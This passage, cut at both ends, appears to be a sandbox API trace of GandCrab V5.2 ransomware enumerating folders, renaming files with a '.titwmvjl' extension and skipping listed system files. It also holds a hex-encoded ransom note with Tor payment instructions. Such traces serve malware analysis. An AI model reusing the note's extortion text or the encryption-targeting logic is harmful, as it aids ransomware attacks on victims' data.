0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.230] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0096.230] CloseHandle (hObject=0x2b4) returned 1 [0096.230] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.231] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.231] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x227)) [0096.231] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.231] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.231] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.231] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a09d2ca4deb61a.lock") returned 60 [0096.231] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\local\\temp\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0096.232] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.232] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.232] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp\\") returned 36 [0096.232] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\*") returned="C:\\Users\\Default\\AppData\\Local\\Temp\\*" [0096.232] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x5035b8 [0096.232] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.232] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.233] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.233] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.233] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.233] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.233] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.233] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a09d2ca4deb61a.lock" [0096.233] lstrlenW (lpString=".titwmvjl") returned 9 [0096.233] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a09d2ca4deb61a.lock") returned 60 [0096.233] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.233] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 69 [0096.233] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a09d2ca4deb61a.lock") returned 60 [0096.233] lstrlenW (lpString=".lock") returned 5 [0096.233] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.234] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.234] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.234] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.234] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.234] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.234] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.234] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\Temp\\TITWMVJL-DECRYPT.txt" [0096.234] lstrlenW (lpString=".titwmvjl") returned 9 [0096.234] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp\\TITWMVJL-DECRYPT.txt") returned 56 [0096.234] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.234] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 65 [0096.234] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp\\TITWMVJL-DECRYPT.txt") returned 56 [0096.234] lstrlenW (lpString=".txt") returned 4 [0096.234] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.234] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.235] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.235] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.235] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp\\TITWMVJL-DECRYPT.txt") returned 56 [0096.235] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp\\TITWMVJL-DECRYPT.txt") returned 56 [0096.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.235] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.235] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.235] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0096.235] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0096.236] CloseHandle (hObject=0x2b4) returned 1 [0096.236] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.236] lstrcmpW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0096.236] lstrcmpW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0096.236] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="Temporary Internet Files" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files") returned="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files" [0096.236] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\") returned="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\" [0096.236] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.236] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.236] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.237] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.237] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.237] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.237] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.237] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.237] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\\\TITWMVJL-DECRYPT.txt") returned 77 [0096.237] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\temporary internet files\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0096.238] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x